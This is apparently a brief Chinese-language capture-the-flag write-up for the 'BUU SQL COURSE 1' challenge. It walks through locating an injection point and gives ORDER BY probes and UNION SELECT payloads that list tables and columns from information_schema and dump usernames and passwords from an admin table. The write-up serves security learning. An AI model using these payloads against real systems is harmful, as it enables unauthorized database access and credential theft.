BUU SQL COURSE 1

BUU SQL COURSE 1"/>

BUU SQL COURSE 1

BUU SQL COURSE 1

1.打开每一个网页都遛了一遍，没发现什么，但是在f12的网络里找到了端倪，明显是个注入点

2.访问页面后开始注入（注意要把#的地方换成backend查看后台数据，不然可能看不到回显）

先测试回显位置

id=1 order by 1
id=1 order by 2
id=1 order by 3//开始没有回显

然后开始注入

?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
//查看表名
?id=0 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
//查看列名
?id=0 union select group_concat(username),group_concat(password) from admin#
//查看字段，得到admin和password

3.用刚才拿到的username和passwd回到一开始的登陆页面输入再登陆，flag就出来啦。

没有什么过滤和其他难点，主要是要找到注入点和看回显的位置